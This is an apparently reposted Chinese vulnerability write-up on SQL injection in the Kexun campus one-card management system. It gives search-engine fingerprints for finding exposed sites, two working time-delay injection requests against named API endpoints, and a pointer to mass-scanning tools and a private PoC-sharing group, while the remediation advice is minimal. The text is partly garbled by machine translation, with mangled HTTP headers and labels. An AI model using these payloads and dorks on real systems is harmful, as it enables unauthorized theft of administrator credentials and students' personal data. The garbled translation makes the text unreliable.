【漏洞复现】科讯校园一卡通管理系统 多处SQL延时注入

【漏洞复现】科讯校园一卡通管理系统 多处SQL延时注入0x01 产品简介
科讯校园一卡通管理系统是一款专为校园环境设计的综合性管理系统,旨在通过数字化、集成化的方式提升校园管理效率,为师生提供更加便捷、高效的校

0x01 产品简介

科讯校园一卡通管理系统是专门针对校园环境设计的综合管理系统,以数字化、一体化的方式提高校园管理效率,为师生创造更加便捷、高效的校园生活提供体验。该系统集成了各种功能模块,包括但不限于消费管理、门禁考勤、用水管理和电控、图书馆管理、机房管理等,满足校园内的各种管理需求。该系统具有“一库一网、一卡一密码、全面”的特点,实现了校内各子系统的无缝连接和统一管理。

0x02 漏洞概述

科讯校园卡管理系统的get_kq_tj_today、DormitoryHealthRanking等多个接口均存在SQL注入漏洞,未经身份验证的远程攻击者可窃取数据库信息(管理员后台密码、用户个人信息)。网站等)。即使拥有很高的权限,也可以向服务器写入木马,以获取服务器系统的进一步权限。

0x03 搜索引擎

body=\’http://www.ahkxsoft.com/\’ body=\’一卡登录\’

0x04 漏洞复现

麻点-1

GET /api/get_kq_tj_today?KaID=1%27;WAITFOR%20DELAY%20%270:0:5%27– HTTP/1.1

主机:

User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36(KHTML、Gecko 等) Chrome/70.0.3538.77 Safari/537.36

Accept-Encoding: gzip、deflate

接受语言: zh-CN,zh;q=0.9

关闭连接:

验证SQL 映射

poc-2

GET /api/dormitoryHealthRanking?building=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27– HTTP/1.1

主机:

User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36(KHTML、Gecko 等) Chrome/70.0.3538.77 Safari/537.36

Accept-Encoding: gzip、deflate

接受语言: zh-CN,zh;q=0.9

关闭连接:

验证SQL 映射

0x05 工具批量

nuclei

afrog

xray

POC脚本获取

使用VX扫描并加入我们内部的POC脚本共享圈。

0x06 修复建议

1.关闭互联网暴露或访问界面设置

2.升级到安全版本

#【漏洞复现】上述科讯校园卡管理系统多次延迟SQL注入相关内容来源仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/93927.html

(0)
CSDN's avatarCSDN
上一篇 2024年7月26日 下午2:54
下一篇 2024年7月26日 下午2:54

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注